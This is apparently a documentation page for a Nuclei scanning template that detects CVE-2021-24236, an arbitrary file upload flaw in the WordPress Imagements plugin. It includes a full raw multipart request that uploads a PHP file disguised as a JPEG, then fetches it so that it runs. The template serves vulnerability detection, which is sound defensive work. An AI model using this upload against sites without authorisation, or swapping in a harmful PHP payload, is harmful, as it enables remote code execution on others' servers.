WordPress Imagements <=1.2.5 - Arbitrary File Upload
ID: CVE-2021-24236
Severity: critical
Author: pussycat0x
Tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project
Description
Section titled “Description”WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.
YAML Source
Section titled “YAML Source”id: CVE-2021-24236
info: name: WordPress Imagements <=1.2.5 - Arbitrary File Upload author: pussycat0x severity: critical description: | WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code. impact: | This vulnerability can lead to remote code execution and compromise the affected WordPress site. remediation: | Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability. reference: - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea - https://wordpress.org/plugins/imagements/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236 - https://nvd.nist.gov/vuln/detail/CVE-2021-24236 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: "CVE-2021-24236" cwe-id: CWE-434 epss-score: 0.15028 epss-percentile: 0.95292 cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: imagements_project product: imagements framework: wordpress tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project
variables: php: "{{to_lower('{{randstr}}')}}.php" post: "1" string: "CVE-2021-24236"
http: - raw: - | POST /wp-comments-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="comment"
{{randstr}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="author"
{{randstr}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="email"
{{randstr}}@email.com ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="url"
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="checkbox"
yes ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="naam"
{{randstr}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="image"; filename="{{php}}" Content-Type: image/jpeg
<?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="submit"
Post Comment ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="comment_post_ID"
{{post}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="comment_parent"
0 ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU-- - | GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1 Host: {{Hostname}}
matchers: - type: word part: body_2 words: - '{{md5(string)}}'# digest: 490a0046304402202bd42b62cc797dfdf88879d7069d731530fb445595487ee1b19872df8874822f0220758fe96c024e95f6fda806beebfffca59cdd0a1bfd920a5eff9bd372d0c6f342:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24236.yaml"